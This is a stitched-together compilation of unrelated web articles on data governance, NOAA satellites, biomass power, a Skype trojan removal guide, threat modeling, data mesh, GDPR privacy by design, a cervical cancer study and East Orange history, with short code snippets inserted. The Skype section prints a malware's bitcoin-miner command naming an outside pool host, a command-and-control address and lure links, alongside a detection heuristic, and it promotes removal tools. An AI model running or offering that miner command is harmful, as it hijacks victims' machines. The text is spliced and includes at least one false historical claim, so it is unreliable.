Data is undoubtedly an organization's most valuable asset. Data governance ensures that data is usable, accessible, and secure. Effective data governance results in enhanced data analytics, which leads to better decision-making and operational support. It also helps to avoid data inaccuracies or discrepancies, which can lead to a variety of organizational challenges, including poor decision-making and integrity problems. Data governance is also critical for regulatory compliance, ensuring that firms consistently meet regulatory obligations at all levels and avoid major financial consequences. In fact, in 2021 JP Morgan was fined $125 million for violations in compliance controls, mostly due to inadequate data and record keeping. In 2022, Morgan Stanley was fined a total of $60 million for data privacy violations that occurred between 2016 and 2019, resolving civil fines as well as a class action lawsuit over defunct data center equipment that had not been properly erased. This is why a data governance strategy is more than just a plan.
To implement a successful data governance program, significant roles and duties are required. This is essential for decreasing risks and operational expenses.

The three most important data governance roles

Data governance is a collaborative activity with roles that are distinct yet interconnected. The three most critical roles that any business must understand in the context of data governance are as follows:

The data owner is in charge of the data in a certain data domain. A data owner must guarantee that the information inside that domain is correctly maintained across various platforms and business processes. Data owners are frequently represented on the executive committee as voting members or as attending members with no voting powers. The following are their specific responsibilities:
- Approving data glossaries and definitions
- Ensuring the accuracy of information utilized inside and beyond the organization
- Supervising operations that are directly relevant to data quality
- Evaluating and approving the Master Data Management (MDM) strategy, outcomes, and actions
- Working with other data owners to resolve data issues and misconceptions across business units
- Performing second-level evaluation of data concerns highlighted by data stewards
- Providing feedback to leadership on software solutions, policies, or regulatory requirements that may affect the data owner's data domain

Senior staff are frequently assigned the role of data owner. For example, the finance director may be the data owner of the organization's financial data. However, due to this degree of seniority, a data owner is frequently unable to participate in activities aimed at controlling data quality on a daily basis. Because data ownership is frequently not a full-time job, the data owner is usually assisted by one or more data stewards. The primary distinction between a data owner and a data steward is that the data steward is in charge of managing the quality of the defined datasets on a daily basis.
The data steward is the Subject Matter Expert (SME) who understands and explains the importance of the information and its use. The data steward also provides insight into the general purposes of the data to the data owner, but will be heavily involved in the intricacies of how these objectives might be realized. A data steward frequently works with other stewards within an organization through a data steward council. This decision-making body weighs choices on potential data concerns and devises remedies. In most discussions, the data steward represents the data owner. If the data steward council cannot agree on how to fix a data problem, this individual will return to the data owner and/or the steering committee. Other responsibilities of the data steward include:
- Creating data definitions and describing allowed values
- Defining rules for data generation, data usage, or data derivatives
- Recognizing and documenting current and desired data systems
- Establishing data quality objectives

Some organizations have established official data steward roles, which are frequently filled by personnel within the business line who have been designated for such responsibilities. Other organizations assign data stewardship tasks to individuals who also have other duties. A successful data steward, regardless of how the role is defined, will adhere to the pre-established data definitions, detect data quality issues, and verify that the business adheres to the set standard.

A data custodian is responsible for developing and maintaining security safeguards for a specific data collection in order to fulfill the Data Governance Framework standards established by the data owner. Many people confuse data custodians with data owners. This is most likely because data custodians are frequently the ones who physically or directly handle the storage and security of a data collection.
However, simply because data is kept on a device that someone controls does not make them the data owner. A data owner is generally in a senior company position, responsible for the categorization, protection, usage, and quality of one or more data sets. Data custodians are IT professionals who manage the security and storage infrastructure of one or more data sets according to an organization's data governance policies. In small businesses where the same person may hold the responsibilities of both the data owner and the data steward, the data owner is likely to outsource day-to-day activities directly to data custodians.

Data masters: a must for data-driven organizations

Data governance adds meaning and security to an organization's data by allowing teams to organize, record, and assess the quality of existing information assets. Data governance ensures that all colleagues have the context they need to trust data, access data, and produce important insights by defining terminology, setting policies, assigning duties, and more. Each of the roles mentioned above is an essential component of a well-managed data governance organization. However, the organization's MDM maturity determines who is the best fit for these roles and how the roles interact with one another. Data alone does not solve issues or generate value; efficient data management and application do. Unsystematic methods of data management can easily turn data into a burden rather than a benefit for a business. Implementing a system with clear roles and responsibilities, such as data owners, stewards, and custodians, is critical for effective data governance.

Data governance is more than just an option

Organizations now have massive volumes of data about their customers, clients, suppliers, patients, workers, and other stakeholders.
An organization with solid data masters will be more successful, as its information will be used more effectively to understand the market and its target audience. That same data governance will guarantee that your organization's data is trustworthy, well documented, easy to discover and access, secure, compliant, and confidential. Communication skills are essential in all of these roles, especially for data masters. Every role holder must be able to articulate their own ideas, pain points, recognized risks and difficulties, business requirements, and ambitions. Of course, there will always be competing goals, as well as different interpretations of business terms, different applications of data, and so on, but that is where data governance and data masters come in. Make sure your business is well positioned and well governed to optimize data governance efforts while minimizing the risk of data breaches.
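One lightweight way to make the owner/steward/custodian split described in this piece concrete is to record all three roles against each governed dataset in a catalog entry. The structure, field names, and example values below are illustrative assumptions for the sketch, not a published standard.

```python
from dataclasses import dataclass

@dataclass
class GovernanceRecord:
    """Catalog entry tying a dataset to its three data-governance roles."""
    dataset: str
    owner: str      # senior party accountable for the data domain
    steward: str    # SME managing day-to-day data quality
    custodian: str  # IT role managing storage and security controls

catalog = [
    GovernanceRecord("finance.invoices", owner="Finance Director",
                     steward="AP Analyst", custodian="DBA Team"),
    GovernanceRecord("hr.employees", owner="HR Director",
                     steward="HRIS Analyst", custodian="DBA Team"),
]

def escalation_path(record: GovernanceRecord) -> list:
    """Day-to-day issues go to the steward; unresolved ones escalate to the owner."""
    return [record.steward, record.owner]
```

Encoding the roles this way mirrors the escalation pattern the article describes: the steward handles routine quality issues, and only unresolved problems reach the more senior data owner.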
The environmental agency collects vast amounts of data each day from its constellation of satellites. The National Oceanic and Atmospheric Administration is charged with predicting changes in climate, weather, oceans and coasts, then sharing that information with the masses. In executing that integral mission, NOAA’s weather and climate measurements ultimately end up as the basis for forecast models millions of Americans consult through weather apps on their mobile devices. Much of that data—tens of terabytes each day of it, actually—come from NOAA’s weather satellite constellations. Satellites in the Joint Polar Satellite System, or JPSS, circle the Earth 14 times each day from pole to pole, using instruments to take measurements of atmospheric conditions, such as land and sea surface temps, rainfall rates, snow and ice cover and even fire locations and smoke plumes. NOAA’s Geostationary Operational Environmental Satellites, or GOES, program provides advanced imagery and measurements of the Earth’s Western Hemisphere more than 22,000 miles above the equator. In addition, the GOES satellites provide lightning mapping data and monitor solar activity and space weather. In this episode of Critical Update, we sat down with NOAA Satellite Scientist Jim Yoe to discuss the agency’s space presence, and how its satellites collect and share important weather and climate measurements that impact millions of people each day. You can listen to the full episode below or download and subscribe to Critical Update in Apple Podcasts or Google Play.
The global biomass power generation market is projected to reach USD 105.7 billion by 2028 from an estimated USD 91.3 billion in 2023, at a CAGR of 3.0% during the forecast period. The biomass power generation market refers to the industry involved in producing electricity from organic materials such as wood, agricultural residues, animal waste, and dedicated energy crops. Biomass power generation typically involves burning these organic materials to produce steam, which then drives turbines to generate electricity.

The Biomass Power Generation Market is poised for substantial growth in the coming years, driven by the key factors outlined below. Collectively, they contribute to a favorable outlook for the biomass power generation market as the world transitions toward a more sustainable and low-carbon energy future.

Renewable Energy Imperative: Nations worldwide are fervently committed to amplifying their renewable energy portfolios, recognizing biomass as a dependable ally in the battle against climate change.

Governmental Backing: With governments offering a slew of incentives and subsidies, the allure of biomass power projects has never been stronger. From lucrative feed-in tariffs to enticing tax breaks, policymakers are fueling investor interest.

Technological Innovation: The relentless march of technological progress is propelling biomass power generation into a new era of efficiency and cost-effectiveness. Cutting-edge combustion methods and advanced biofuel production techniques are reshaping the landscape.

Sustainable Waste Management: Biomass power plants aren't just powerhouses; they're eco-warriors, turning organic waste into clean energy. By diverting agricultural and municipal waste from landfills, they're combating greenhouse gas emissions head-on.
Energy Independence: Biomass resources, often abundant locally, offer a beacon of energy independence, reducing dependence on imported fossil fuels and bolstering national security.

Seamless Integration: Biomass power generation seamlessly integrates with existing infrastructure, offering a smooth transition to renewables. Whether co-firing with coal or retrofitting existing plants, the path to sustainability is clear.

Environmental Champions: As carbon-neutral power producers, biomass plants are leading the charge in environmental stewardship. By harnessing organic materials that would otherwise emit greenhouse gases, they're making significant strides in the fight against climate change.

Biomass Power Generation Market by Technology (Combustion, Gasification, Anaerobic Digestion, Pyrolysis), Feedstock (Agricultural Waste, Forest Waste, Animal Waste, Municipal Waste), Fuel (Solid, Liquid, Gaseous) and Region - Global Forecast to 2028
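The headline figures can be sanity-checked with a one-line compound annual growth rate calculation: growing from USD 91.3 billion (2023) to USD 105.7 billion (2028) over five years implies a CAGR of roughly 3%, matching the stated forecast.

```python
# Verify the reported CAGR from the 2023 and 2028 market-size figures.
start, end, years = 91.3, 105.7, 5  # USD billions, 2023 -> 2028

cagr = (end / start) ** (1 / years) - 1
print(f"Implied CAGR: {cagr:.1%}")  # about 3.0%, matching the report
```

The same formula run in reverse (start × (1 + CAGR)^years) reproduces the 2028 projection.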
Skype virus is a trojan, distributed through the Skype network only. This is how it works: a victim receives a message containing a link, apparently sent by one of his or her Skype friends. The message might mention your name and look real. All of the infected person's friends using Skype receive one. Users in the following countries are the most victimized: Italy, Russia, Poland, Costa Rica, Spain, Germany and Ukraine. However, the list of countries whose users can be affected is not limited, meaning you yourself can become a victim of this trojan as well. On an interesting note, the installer of the virus is downloaded from a server located in India.

About Skype Virus

Skype virus is not a single piece of malware, but a group of parasites made by different scammers for close to 10 years. The first version of such malware was launched around 2008, and new attacks happen all the time. The concept is not new: chat viruses plagued other platforms like ICQ, MSN, AIM and IRC.

Skype virus works in one of several possible ways:
- The trojan steals passwords and exploits the victim's Skype to send malicious links to his or her friends and, thus, spread itself further.
- It attaches itself to the Skype process without stealing the password and uses it to send out spam.

Both versions try to modify and delete chats with the contacts that were spammed, so they can continue to do so for longer. Statistics provided by the goo.gl and bit.ly URL shorteners show that these links are clicked around 12,000 times an hour. Thus, we may regard Skype virus as a very successful social engineering scam. Interestingly enough, the malevolent link can even be sent from inactive accounts. Once the link has been clicked, a .zip file (it can also be a .scr file) is downloaded onto your computer's system. Inside the .zip file there is an .exe file, which is the executable of the Skype trojan. After it has been executed, your machine is infected with the virus.
Skype virus installs other pieces of malware onto the victim's computer system. The source of these malicious downloads is the Hotfile.com service. The malware's C&C (Command and Control) server is located in Germany. Its IP address is 18.104.22.168:9000. One of the malicious installs is a Bitcoin generator, a tool that produces bitcoins, a cryptography-based digital currency. It is run by the command bitcoin-miner.exe -a 60 -l no -o http://suppp.cantvenlinea.biz:1942/ -u [email protected] -p XXXXXXXX (the letter X covers the personally identifiable information). This process requires a lot of CPU (Central Processing Unit) resources, which, in turn, makes your computer run at an extremely slow pace; it can consume 90 percent of the CPU or even more. Because of the degraded performance of your device, and due to the other dangerous applications that have entered your computer's system, you need to scan your computer with an antivirus utility, such as Malwarebytes. Other possible malicious payloads include keyloggers, spam viruses and ransomware; this depends on what pays out the most for the malware makers.

How Has Skype Trojan Infected Your PC?

Most probably, you have received a message with a link from one of your friends on Skype. In fact, it was not a message sent from a friend of yours on Skype, but a scam message containing a malicious link coming from the developers of the malicious program, namely Skype virus. The text of the message would have been something like "Look, this is a very nice photo of you", "This is my favorite picture of you", "Your photo isn't that great" or "I don't think I will ever sleep again after seeing this photo", etc., followed by a link to a bogus Facebook, Twitter, Google+ or Pinterest website. The message can vary in each particular case, but its purpose is exactly the same: it is written so that you follow the provided link.
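As a purely defensive illustration, the lure messages described above share a recognizable shape: a flattering or alarming phrase about a photo plus a URL-shortener link. A crude filter along these lines could flag such messages for review. The phrase list and patterns are hypothetical assumptions for the sketch, not rules from any real security product.

```python
import re

# Hypothetical heuristic matching the lure pattern described above:
# a goo.gl/bit.ly shortened URL combined with a "photo of you" style phrase.
SHORTENER_LINK = re.compile(r"https?://(goo\.gl|bit\.ly)/\S+", re.IGNORECASE)
LURE_PHRASES = ("photo of you", "picture of you", "your photo")

def looks_like_lure(message: str) -> bool:
    msg = message.lower()
    return bool(SHORTENER_LINK.search(message)) and any(p in msg for p in LURE_PHRASES)

# Example resembling the messages quoted in this write-up.
sample = "This is a very nice photo of you http://goo.gl/XXX?image=imgXXX.jpg"
```

A real filter would need far more robust URL parsing and reputation checks; this only demonstrates that the lure pattern is simple enough to detect mechanically.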
An example of the link accompanying the message is http://goo.gl/XXX?image=imgXXX.jpg or http://bit.ly/XXXX. When the link has been clicked, it does not show any photo but redirects to a scam site. The malicious code running on that website infects the user's computer with the Skype trojan along with other malicious modules.

The Skype trojan and the programs it has installed on your computer can be removed by running a full system scan with one of the following professional security scanners: Spyhunter or Hitman. As we have just revealed, this is a complex infection; thus, automatic tools are recommended. After cleaning the PC, it is critically important to change your Skype password.

Automatic Malware removal tools
Cyber threat modeling aims to answer the fundamental question: “What potential security threats and vulnerabilities exist within this system, and what measures can we implement to mitigate these risks effectively?” The process of threat modeling typically involves several key steps, each of which plays a crucial role in understanding and mitigating security risks: - Define the Scope: Begin by defining the scope of the threat modeling exercise. This involves identifying the system or application under analysis, including its boundaries, components, and interfaces with external entities. Understanding the scope helps focus the threat modeling efforts on the most critical areas. - Identify Assets: Identify the assets within the scope of the system that need to be protected. These assets can include sensitive data, software components, hardware devices, networks, and other resources that are valuable to the organization and could be targeted by attackers. - Understand the Architecture: Gain a deep understanding of the system’s architecture, including its design, functionality, data flows, and dependencies. This step involves analyzing architectural diagrams, system documentation, and other relevant artifacts to identify potential attack surfaces and weak points in the system. - Identify Threats: Brainstorm and identify potential threats to the system’s security. Threats can come from various sources, including malicious actors, technical vulnerabilities, insider threats, natural disasters, or human error. Consider both known threats based on past experiences and potential new threats that may arise. - Assess Risks: Assess the risks associated with each identified threat by considering factors such as the likelihood of occurrence, the potential impact on the system, and the effectiveness of existing security controls. Prioritize risks based on their severity and likelihood to focus mitigation efforts on the most critical areas of concern.
- Mitigate Risks: Develop and prioritize mitigation strategies to address the identified risks and vulnerabilities. This may involve implementing security controls, applying best practices, redesigning system components, updating policies and procedures, or providing security awareness training to users. - Validate and Review: Validate the effectiveness of the mitigation strategies through testing, review, and validation. This step involves conducting security assessments, penetration testing, code reviews, and other validation activities to ensure the implemented security controls effectively mitigate the identified risks. - Document and Communicate: Document the findings of the threat modeling process, including identified threats, assessed risks, and mitigation strategies. Communicate the results to stakeholders, including developers, system architects, security professionals, and business leaders, to raise awareness of security risks and ensure buy-in for the proposed mitigation measures. Threat modeling should be viewed as an ongoing and iterative process, with regular reviews and updates to adapt to evolving threats and changes in the system environment.
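The "Assess Risks" step is often operationalized as a simple likelihood-times-impact score used to rank threats before mitigation planning. The 1-5 scales and the example threats below are illustrative assumptions, not part of any formal methodology.

```python
# Minimal risk-prioritization sketch for the "Assess Risks" step:
# score = likelihood x impact, each on an assumed 1-5 scale.
threats = [
    {"threat": "SQL injection on login form", "likelihood": 4, "impact": 5},
    {"threat": "Lost backup tape",            "likelihood": 2, "impact": 4},
    {"threat": "Defaced marketing page",      "likelihood": 3, "impact": 2},
]

for t in threats:
    t["risk"] = t["likelihood"] * t["impact"]

# Highest-risk threats first, to focus mitigation effort where it matters most.
ranked = sorted(threats, key=lambda t: t["risk"], reverse=True)
```

Real programs typically use richer scoring schemes (e.g., CVSS or DREAD-style factors), but the prioritization principle is the same: rank by severity and likelihood, then mitigate from the top.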
A data mesh is an architecture for implementing the democratization of data across a business. Unlike centralized data warehouses, a data mesh federates data and delegates data ownership to the specialist business domains, which publish their data as a service for all business functions to consume. The result is a more agile data architecture that allows individual business units some autonomy to manage their core data assets.

Why Use a Data Mesh Architecture?

The primary idea behind mesh architectures is to enable a more flexible and scalable data architecture. Monolithic, centralized enterprise data warehouses can be cumbersome to implement, inflexible, and expensive to change. By devolving the curation and administration of domain-specific data sets to the business functions that know them best, the business can better adapt to changing business conditions. One of the primary reasons why the data mesh model scales is that it avoids overburdening centralized data teams. This is accomplished by propagating standard best practices across business domains. Skills shortages are a common cause of big data and data lake projects stagnating into data swamps. Skills gained by staff in one business domain are easily transferred to other domains, reducing training times and allowing projects to be delivered faster.

Maintaining Interoperability Between Pools of Data

A core component of a data mesh is the built-in universal interoperability bus that all the domain-specific data warehouses or data marts plug into. This avoids the problems of traditional siloed data marts, which often use duplicate, out-of-sync data and ad hoc tools. Curated data held by one department is available to related business units. Each departmental data warehouse publishes its data-as-a-product to the interoperability bus.

How is a Data Mesh Different from a Data Fabric?
A data mesh is composed of an interconnected set of domain-specific data product services, with ownership responsibilities delegated to the various domains in a business. A data fabric, by contrast, creates a single virtual centralized system without distributed data ownership.

Key Elements of a Data Mesh

The main components of a data mesh are:
- Data sources.
- Data infrastructure.
- Domain-specific data-as-a-service.
- Shared standardized governance, data quality and metadata conventions.

Data Ownership and Responsibilities

Each domain data owner agrees with its peers on data quality and availability service levels. Every domain uses centralized standards for data pipelines, and the data mesh provides standardized storage and streaming infrastructure. ETL pipelines can be domain specific but need to use standard metadata labels, data formats, cataloging, lineage, and data governance conventions to ease interoperability and promote compliance.

Some of the many benefits of data mesh architectures include the following:
- Faster time to value for data-oriented projects.
- Lines of business can respond quickly to competitive, regulatory and market pressures, or to opportunities to explore new markets.
- Shared tools, standards, and processes benefit the whole business, increasing efficiency by reducing duplicated effort.
- Avoids central resource bottlenecks by delegating data responsibilities to specialist business domains that best understand their data needs.
- More modular data services are easier to understand and use. As with microservices, refactoring monolithic applications into smaller, more digestible components makes them easier to share and consume.
- Consistent application of data quality and data governance requirements across a business improves cooperation and eases future data integration efforts.
- Data and process transparency in the mesh eliminates departmental pools of unconnected siloed data.
- Businesses get more value from their data because federating it across the organization enables better data-driven decision-making.

What Are the Characteristics of a Successful Data Product?

The most significant success factor for a data product is adoption. The characteristics that drive adoption include discoverability, reliability, trustworthiness, security, and data quality. Because a data mesh is essentially a self-service model, published data needs to be easy to find, well documented, and easy to consume. Consumers can provide feedback to domain owners on the quality and utility of a data product to ensure shortcomings are addressed and to enable continuous refinement.

Data Mesh Management

Data products and pipelines need to be supervised at the domain and infrastructure levels to ensure high availability and address failures. Monitoring and observability capabilities are therefore designed in to make the lives of developers and infrastructure teams easier. Data products should be protected by encrypting data at rest and in motion. Versioning of data services enables the rollback of bad deployments.

Actian Supports Data Marts

The Actian Data Platform can support multiple data marts and warehouses hosted on-premises or on multiple cloud platforms. Actian has built-in connectors to hundreds of prebuilt sources, including NetSuite, Salesforce and ServiceNow. The Actian Data Platform uses a vectorized columnar database that outperforms alternatives by 7.9x and is ideal for staging data before it is published as a data product within a domain.

The Three Components of a Data Product
- Code, including data pipelines, policies and application interfaces.
- Data and metadata, which can include tables, views, graphs, and associated metadata.
- Infrastructure, which includes scripts to build and instantiate a data product service.
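The shared metadata and governance conventions discussed in this piece are often carried in a machine-readable data product descriptor that each domain publishes alongside its data (owner, SLA, schema, lineage). The field names and values below are illustrative assumptions, not a formal specification.

```python
# Illustrative data product descriptor for a domain-owned data product.
# All field names and values are assumptions for the sketch.
descriptor = {
    "name": "orders.daily-shipments",
    "domain": "fulfillment",
    "owner": "fulfillment-team@example.com",
    "output_port": {"format": "parquet",
                    "location": "s3://mesh/fulfillment/shipments/"},
    "sla": {"freshness_hours": 24, "availability_pct": 99.5},
    "schema": [
        {"column": "order_id", "type": "string"},
        {"column": "shipped_at", "type": "timestamp"},
    ],
    "lineage": ["erp.orders", "wms.shipments"],
}

def columns(desc: dict) -> list:
    """Consumers can discover the product's columns from the descriptor alone."""
    return [c["column"] for c in desc["schema"]]
```

Publishing such descriptors to a shared catalog is one common way to make data products discoverable and self-describing, which are exactly the adoption characteristics the article calls out.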
The proliferation of social networking and collaboration tools has ushered in a new era of the remote enterprise workforce; however, they have also made organizational boundaries non-static, making it increasingly difficult to safeguard the confidential and personal data of business partners, employees and customers. In these politically uncertain times, defending privacy is paramount to the success of every enterprise. The threats and risks to data are no longer theoretical; they are apparent and menacing. Tech decision makers have to step in front of the problem and respond to the challenge. Adopting the privacy by design framework is a surefire way of protecting all users from attacks on their privacy and safety.

The bedrock of privacy by design (PbD) is the anticipation, management and prevention of privacy issues during the entire life cycle of the process or system. According to the PbD philosophy, the most ideal way to mitigate privacy risks is not to create them to begin with. Its architect, Dr. Ann Cavoukian, devised the framework to deal with the rampant issue of developers applying privacy fixes after the completion of a project. The privacy by design framework has been around since the 1990s, but it is yet to become mainstream. That will soon change. The EU's data protection overhaul, the GDPR, which comes into effect in May 2018, demands privacy by design as well as data protection by default across all applications and uses.
This means that any organization that serves EU residents has to adhere to the newly set data protection standards, regardless of whether it is itself located within the European Union. The GDPR has made a risk-based approach to pinpointing digital vulnerabilities and eliminating privacy gaps a requirement. Article 25 of the General Data Protection Regulation codifies both the concepts of privacy by design and privacy by default. Under the ‘privacy by design’ requirement, organizations will have to set up compliant procedures and policies as fundamental components in the design and maintenance of information systems and in their mode of operation. In practice, privacy by design measures may include pseudonymization or other technologies capable of enhancing privacy. Article 25 states that a data controller has to implement suitable organizational and technical measures both at the time a mode of processing is determined and at the time the data is actually processed, in order to guarantee that data protection principles like data minimization are met. Simply put, privacy by default denotes that strict privacy settings should be applied by default the moment a service is released to the public, without requiring any manual input from the user. Additionally, any personal data provided by the user to facilitate the optimal use of a product must only be kept for the amount of time needed to offer said service or product. The example commonly given is the creation of a social media profile: the default settings should be the most privacy-friendly. Details such as name and email address would be considered essential information, but not age or location, and all profiles should be set to private by default. Privacy Impact Assessments are an intrinsic part of the privacy by design approach. 
A PIA highlights what Personally Identifiable Information is collected and further explains how that data is maintained, how it will be shared and how it will be protected. Organizations should conduct a PIA to assess legislative authority and to pinpoint and mitigate privacy risks before sharing any personal information. Not only will the PIA aid in the design of more efficient and effective processes for handling personal data, but it can also reduce the associated costs and damage to reputation that could potentially accompany a breach of data protection regulations and laws. The ideal time to complete a Privacy Impact Assessment is at the design stage of a new process or system, and then to revisit it as legal obligations and program requirements change. Under Article 35 of the GDPR, data protection impact assessments (DPIA) are inescapable for companies with processes and technologies that will likely result in a high risk to the privacy rights of end-users. The main objectives of privacy by design are to ensure privacy and control over personal data. Organizations can gain a competitive advantage by practicing the seven foundational principles. These principles of privacy by design can be applied to all the varying types of personal data. The rigor of the privacy measures typically corresponds to the sensitivity of the data.
I. Proactive not reactive; preventative not remedial – Be prepared for, pinpoint, and avert privacy issues before they occur. Privacy risks should never materialize on your watch; get ahead of invasive events before the fact, not afterward.
II. Privacy as the default setting – The end user should never have to take any additional action to secure their privacy. Personal data is automatically protected in all business practices and IT systems right off the bat.
III. Privacy embedded into design – Privacy is not an afterthought; it should instead be part and parcel of the design, as a core function of the process or system.
IV. Full functionality (positive-sum, not zero-sum) – PbD eliminates the need to make trade-offs, and instead seeks to meet the needs of all legitimate objectives and interests in a positive-sum manner, circumventing false dichotomies.
V. End-to-end lifecycle protection – An adequate data minimization, retention and deletion process should be fully integrated into the process or system before any personal data is collected.
VI. Transparency and visibility – Regardless of the technology or business practice involved, the set privacy standards have to be visible, transparent and open to providers and users alike; they should also be documented and independently verifiable.
VII. Keep it user-centric – Respect the privacy of your users/customers by offering granular privacy options, solid privacy defaults, timely and detailed information notices, and empowering, user-friendly options.
The General Data Protection Regulation makes privacy by design and privacy by default legal requirements in the European Union. So if you do business in the EU or process any personal data belonging to EU residents, you will have to implement internal processes and procedures to address the set privacy requirements. A vast majority of organizations already prioritize security as part of their processes. However, becoming fully compliant with the privacy by design and privacy by default requirements may demand additional steps. This will mean implementing a privacy impact assessment template that can be populated every time a new system is procured, implemented or designed. Organizations should also revisit their data collection forms to make sure that only essential data is being collected. Lastly, it will be prudent to set up automated deletion processes for specific data, implementing technical measures to guarantee that personal data is flagged for deletion once it is no longer required. 
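The automated deletion step described above can be sketched in a few lines of shell. The 30-day window and the file names are illustrative assumptions, not values prescribed by the GDPR; a real deployment would point the sweep at its actual data stores:

```shell
#!/bin/sh
# Hypothetical retention sweep: delete personal-data exports once their
# retention window has expired. A temporary demo directory stands in for
# a real export location such as /var/app/exports.
RETENTION_DAYS=30
DIR=$(mktemp -d)
touch -d "40 days ago" "$DIR/old_export.csv"   # past retention
touch "$DIR/fresh_export.csv"                  # still within retention
find "$DIR" -type f -mtime +"$RETENTION_DAYS" -delete
ls "$DIR"    # only fresh_export.csv remains
rm -rf "$DIR"
```

Scheduled from cron, a sweep like this enforces the storage-limitation principle mechanically instead of relying on manual clean-ups.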
FileCloud checks all the boxes when it comes to the seven principles of privacy by design and offers granular features that will set you on the path to full GDPR compliance. Click here for more information. Author Gabriel Lando
<urn:uuid:2e4d4005-cf94-41db-8293-da15d6ed8672>
CC-MAIN-2024-38
https://www.filecloud.com/blog/2018/04/designing-privacy-to-meet-gdpr-compliance/
2024-09-13T19:21:27Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651535.66/warc/CC-MAIN-20240913165920-20240913195920-00396.warc.gz
en
0.934278
1,444
2.578125
3
This trend is not being witnessed in California or the United States alone, but globally as well. Among the many reasons contributing to it are the current screening and follow-up guidelines. The study findings were published in the peer-reviewed journal Cancer Epidemiology, Biomarkers & Prevention. A new study conducted by UC Davis Comprehensive Cancer Center researchers shows an alarming number of California women 65 and older are facing late-stage cervical cancer diagnoses and dying from the disease. This is despite guidelines that recommend most women stop screening for cervical cancer at this age. “Our findings highlight the need to better understand how current screening guidelines might be failing women 65 and over,” the study’s lead author, UC Davis senior statistician Julianne Cooley, said. “We need to focus on determining the past screening history of older women as well as lapses in follow-up care. We must utilize non-invasive testing approaches for women nearing age 65 or those who need to catch up on their cervical cancer screenings.” The findings from the study, published in Cancer Epidemiology, Biomarkers & Prevention on January 9, 2023, showed nearly one in five new cervical cancers diagnosed from 2009-2018 were in women 65 and older. More of these women (71%) presented with late-stage disease than younger women (48%), with the number of late-stage diagnoses increasing up to age 79. Late-stage five-year relative survival was lower for women 65 and over (23.2%-36.8%) compared to patients under 65 (41.5%-51.5%). Women 80 years and older had the lowest survival of all age groups. “Our study found worsening five-year relative survival from cervical cancer with each increasing age category for both early and late-stage diagnoses,” said co-author Theresa Keegan, a professor in the UC Davis Division of Hematology and Oncology. 
California Cancer Registry provided critical data
The study utilized a large set of population-based data from the California Cancer Registry. This state-mandated cancer surveillance system has collected cancer incidence and patient demographic, diagnostic, and treatment information since 1988. The data was used to identify all women 21 years and older who were diagnosed with a first primary cervical cancer in California from 2009-2018, the 10 most recent years that complete data was available. Among women 65 and older, those who had comorbidities or were older were more likely to be diagnosed with late-stage disease. “Interestingly, prior studies of younger women have found increased late-stage cervical cancer diagnoses among young Hispanic/Latina and Black women,” Cooley said. “Our study did not observe these associations and instead found that older Hispanic/Latina women were less likely than non-Hispanic white women to be diagnosed late-stage.”
Current screening guidelines
Following the introduction and widespread adoption of the Papanicolaou (Pap) smear test in the 1940s, cervical cancer incidence and mortality have fallen significantly. However, incidence rates have plateaued since 2012, and rates of invasive cervical cancer have actually increased in recent decades. Through adequate screening and follow-up, cervical cancer can be prevented or detected at an early stage, which leads to excellent survival. However, current guidelines recommend discontinuing screening for women 65 or older who have had a history of normal Pap and/or Human Papillomavirus (HPV) tests, potentially leaving this age group vulnerable.
Lack of adherence to screening
Previous studies have shown that 23.2% of women in the U.S. who are over 18 are not up to date on recommended cervical cancer screening. Disadvantaged women such as those who are uninsured or poor are the least likely to report being up to date with cervical cancer screening. 
“Scheduled screenings may also decrease as women approach 65, increasing the likelihood that women have not been adequately screened prior to the upper age cutoff,” co-author and senior epidemiologist Frances Maguire said. Additional factors may contribute to older women not receiving adequate screening:
- Specific type of hysterectomy. A supracervical hysterectomy leaves the cervix intact and some women do not realize they need to continue screening for cervical cancer.
- Discomfort. Women may tire of Pap smears due to embarrassment and the intrusiveness of a speculum-based exam.
- Pap tests less accurate. The screening may not be as accurate in post-menopausal women in detecting adenocarcinoma, which has been increasing in incidence (as compared to squamous cell carcinoma).
- HPV testing. Women in the older age group may not have received HPV testing, now the gold standard of cervical cancer screening, which wasn’t widely available until 2003.
The Centers for Disease Control reports that almost all cases of cervical cancer are HPV-related.
<urn:uuid:30180ccf-ac83-409d-876a-d627ecfa5cc3>
CC-MAIN-2024-38
https://debuglies.com/2023/01/10/more-women-aged-65-and-above-are-dying-from-cervical-cancer/
2024-09-17T11:12:05Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00096.warc.gz
en
0.961164
1,016
2.515625
3
East Orange, New Jersey
The regions of East Orange can be traced back to a colony in New Haven, Connecticut. About 30 families from New Haven came by water in 1666 to develop a town situated on the Passaic River. The territory this group arrived on currently encompasses several municipalities, including Newark and the Oranges. That area was on a land grant’s northeast portion, conveyed by England’s King Charles II to the Duke of York (James, his brother). James later conveyed the land to a couple of proprietors – Sir George Carteret and Lord John Berkeley. Carteret was the Isle of Jersey’s Royal Governor, and that territory became what we know today as – you guessed it – “New Jersey.” Initially, East Orange had been part of New York, and was originally called “Newark Mountains.” In the summer of 1780, though, Newark Mountains’ townspeople voted to change the name to just “Orange.” During that time, many people favored secession from the city of Newark. This transpired in 1806, as the territory that encompassed the Oranges became detached. In the spring of 1807, a government had been elected for the first time, but Orange wasn’t incorporated officially as their city until March 1860. Once that happened, the city started fragmenting into many smaller communities, mostly because local disputes ensued over the costs involved with establishing fire, street, and police departments. In early 1861, South Orange became organized. In 1862, Fairmount came into existence (eventually becoming part of West Orange). In 1863, East Orange came about. Finally, West Orange debuted in 1863 (though it included Fairmount). East Orange became reincorporated as its own city in 1899, per the results of a referendum held a couple of days prior. Based on statistics from the US Census Bureau, East Orange had a total area of 10.17 km² (3.93 sq mi), all of it land. 
Geographically speaking, East Orange shares borders with its fellow Essex County municipalities: Newark to the South and East, South Orange toward the Southwest, Bloomfield and Glen Ridge toward the North, and Orange toward the West. A couple of unincorporated localities, place names, and communities located completely or partially inside the city are Brick Church and Ampere.
Map Of East Orange, NJ
The Ambrose–Ward mansion represents the wealth East Orange used to be renowned for. It was built for a manufacturer of books in 1898. It is currently where New Jersey’s African-American fund is situated. East Orange is divided up into five different wards. It is also divided unofficially into several different neighborhoods, most of which have homes and streets that are well maintained.
